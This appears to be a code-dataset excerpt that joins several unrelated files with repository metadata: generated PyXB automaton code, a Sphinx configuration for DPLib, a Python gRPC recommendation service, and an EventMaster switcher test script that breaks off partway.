transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_13, False) ]))
st_15._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_14, False) ]))
st_16._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_15, True) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_15, False) ]))
st_17._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_16, True) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_16, False) ]))
st_18._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_17, True) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_17, False) ]))
st_19._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_18, True) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_18, False) ]))
st_20._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_19, True) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_19, False) ]))
st_21._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_20, True) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_20, False) ]))
st_22._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_21, True) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_21, False) ]))
st_23._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_22, True) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, True) ]))
st_35._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
groupType._Automaton = _BuildAutomaton_30()
| gpl-3.0 | -2,637,278,550,881,976,000 | 56.410293 | 918 | 0.716241 | false |
mRokita/DPLib | docs_src/conf.py | 1 | 4933 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# DPLib documentation build configuration file, created by
# sphinx-quickstart on Wed Jun 28 11:28:21 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
import os
import sys
import sphinx_rtd_theme
sys.path.insert(0, os.path.abspath('..'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'DPLib'
copyright = '2017-2018, Michał Rokita'
author = 'Michał Rokita'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.5'
# The full version, including alpha/beta/rc tags.
release = '1.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'DPLibdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DPLib.tex', 'DPLib Documentation',
'Michał Rokita', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'dplib', 'DPLib Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DPLib', 'DPLib Documentation',
author, 'DPLib', 'One line description of project.',
'Miscellaneous'),
]
| agpl-3.0 | 6,852,914,549,952,779,000 | 28.345238 | 79 | 0.671805 | false |
census-ecosystem/opencensus-microservices-demo | src/recommendationservice/recommendation_server.py | 1 | 4084 | #!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import grpc
from concurrent import futures
import time
import traceback
import random
import os
import googleclouddebugger
import demo_pb2
import demo_pb2_grpc
from grpc_health.v1 import health_pb2
from grpc_health.v1 import health_pb2_grpc
# TODO(morganmclean,ahmetb) tracing currently disabled due to memory leak (see TODO below)
# from opencensus.trace.ext.grpc import server_interceptor
# from opencensus.trace.samplers import always_on
# from opencensus.trace.exporters import stackdriver_exporter
# from opencensus.trace.exporters import print_exporter
class RecommendationService(demo_pb2_grpc.RecommendationServiceServicer):
def ListRecommendations(self, request, context):
max_responses = 5
# fetch list of products from product catalog stub
cat_response = product_catalog_stub.ListProducts(demo_pb2.Empty())
product_ids = [x.id for x in cat_response.products]
filtered_products = list(set(product_ids)-set(request.product_ids))
num_products = len(filtered_products)
num_return = min(max_responses, num_products)
        # sample a list of indices to return
indices = random.sample(range(num_products), num_return)
# fetch product ids from indices
prod_list = [filtered_products[i] for i in indices]
print("[Recv ListRecommendations] product_ids={}".format(prod_list))
# build and return response
response = demo_pb2.ListRecommendationsResponse()
response.product_ids.extend(prod_list)
return response
def Check(self, request, context):
return health_pb2.HealthCheckResponse(
status=health_pb2.HealthCheckResponse.SERVING)
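# A minimal sketch (not part of the original service) of the same
# filter-and-sample step ListRecommendations performs above, using
# hypothetical product ids; the helper and its data are illustrative only.
def _sample_recommendations_sketch():
    catalog_ids = ["p1", "p2", "p3", "p4", "p5", "p6"]  # stand-in for the catalog response
    already_seen = ["p2", "p5"]  # stand-in for request.product_ids
    filtered = list(set(catalog_ids) - set(already_seen))
    num_return = min(5, len(filtered))
    indices = random.sample(range(len(filtered)), num_return)
    return [filtered[i] for i in indices]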
if __name__ == "__main__":
print("initializing recommendationservice")
# TODO(morganmclean,ahmetb) enabling the tracing interceptor/sampler below
# causes an unbounded memory leak eventually OOMing the container.
# ----
# try:
# sampler = always_on.AlwaysOnSampler()
# exporter = stackdriver_exporter.StackdriverExporter()
# tracer_interceptor = server_interceptor.OpenCensusServerInterceptor(sampler, exporter)
# except:
# tracer_interceptor = server_interceptor.OpenCensusServerInterceptor()
try:
googleclouddebugger.enable(
module='recommendationserver',
version='1.0.0'
)
    except Exception as err:
print("could not enable debugger")
traceback.print_exc()
pass
port = os.environ.get('PORT', "8080")
catalog_addr = os.environ.get('PRODUCT_CATALOG_SERVICE_ADDR', '')
if catalog_addr == "":
raise Exception('PRODUCT_CATALOG_SERVICE_ADDR environment variable not set')
print("product catalog address: " + catalog_addr)
channel = grpc.insecure_channel(catalog_addr)
product_catalog_stub = demo_pb2_grpc.ProductCatalogServiceStub(channel)
# create gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) # ,interceptors=(tracer_interceptor,))
# add class to gRPC server
service = RecommendationService()
demo_pb2_grpc.add_RecommendationServiceServicer_to_server(service, server)
health_pb2_grpc.add_HealthServicer_to_server(service, server)
# start server
print("listening on port: " + port)
server.add_insecure_port('[::]:'+port)
server.start()
# keep alive
try:
while True:
time.sleep(10000)
except KeyboardInterrupt:
server.stop(0)
| apache-2.0 | 186,685,864,770,840,540 | 36.127273 | 107 | 0.706905 | false |
kyelewisstgc/EventMaster-Python | tests/test_old.py | 1 | 4851 | #Import Libraries
import eventmaster as EM
from time import sleep
import random
import sys
def run_test(name_string, command_send_string, command_receive_string, test_untyped):
sys.stdout.write('{0!s} Test ...'.format(name_string))
guid_1 = eval(command_send_string)
while s3.has_been_processed(guid_1) != 1:
        sleep(1)
sys.stdout.write('.')
sys.stdout.flush()
    test_rtn = eval(command_receive_string)
if(test_rtn == test_untyped):
print(' [OK]')
else:
print(' [FAILED]')
print(" {0!s} was {1!s}, should have been {2!s}".format(name_string, test_rtn, test_untyped))
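# Example call shape (hypothetical input id and setter; s3 is created below):
#   run_test("Input 0 Freeze",
#            "s3.getInput(0).setFreeze(1)",
#            "s3.getInput(0).getFreeze()",
#            1)
# The send string is evaluated and returns a guid; run_test polls
# s3.has_been_processed() on that guid, then evaluates the receive string and
# compares its result against the expected value.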
""" Create new Instance of EventMasterSwitcher and turn off logging """
s3 = EM.EventMasterSwitcher()
s3.setVerbose(0)
""" Wait for a device to be discovered on the local network """
while not s3.getDiscovery():
print("Discovering Devices...")
sleep(2)
""" Retrieve the first discovered device """
discovered_devices = s3.getDiscovery()
dev = discovered_devices[0]
print( ("Using discovered {0!s} named {1!s} on version {4!s} at {2!s}:{3!s}"
"").format(dev['Type'],
dev['Name'],
dev['IP'],
dev['Port'],
dev['OSVersion']) )
""" Connect to the device """
s3.setIP(dev['IP'])
if not s3.start():
print("Error Connecting to E2/S3.")
""" s3.isReady returns 0 if no connection, 1 if connected and synced, or 2 if
connected but waiting for sync """
while s3.isReady() != 1:
print("Waiting for E2/S3 to be ready...")
sleep(1)
print("Connected!")
""" Enumerate all Inputs and print known information for each """
print("# Inputs")
for input_id in s3.enumInputs():
frzmode_int = s3.getInput(input_id).getFreeze()
    state_string = "is Frozen" if frzmode_int == 1 else "is not Frozen"
print(" ({0!s}) {1!s} {2!s}".format(input_id, s3.getInput(input_id).getName(), state_string))
""" Enumerate all Destinations and print known information for each """
print("\r\n# Destinations:")
for dest_id in s3.enumDestinations():
dest_layers = s3.enumLayers(dest_id)
print(" ({0!s}) {1!s} is {2!s} x {3!s}".format(dest_id, s3.dests[dest_id]['Name'], s3.dests[dest_id]['HSize'], s3.dests[dest_id]['VSize']) )
print(" ({0!s}) has {1!s} layers".format(dest_id, len(dest_layers)))
""" Enumerate all Layers for Destination and print known information for each """
for layer_id in dest_layers:
layer_name = s3.getLayer(dest_id, layer_id).getName()
layer_owin = s3.getLayer(dest_id, layer_id).getOWIN()
layer_hpos = layer_owin["HPos"]
layer_hsize = layer_owin["HSize"]
layer_vpos = layer_owin["VPos"]
layer_vsize = layer_owin["VSize"]
size_string = " is {0!s}x{1!s} at {2!s},{3!s}".format(layer_hsize, layer_vsize, layer_hpos, layer_vpos)
            print("    ({0!s}) {1!s} {2!s}".format(layer_id, layer_name, size_string))
"""
print("\r\n# Input Tests:")
for input_id in s3.enumInputs():
run_test("{0!s} Freeze".format(input_id), "s3.get_input({0!s}).setFreeze(eventmaster.FRZMODE_ON)".format(input_id), "s3.get_input({0!s}).get_Freeze()".format(input_id), 1)
run_test("{0!s} Un-Freeze".format(input_id), "s3.get_input({0!s}).setFreeze(E2S3.FRZMODE_OFF)".format(input_id), "s3.get_input({0!s}).get_Freeze()".format(input_id), 0)
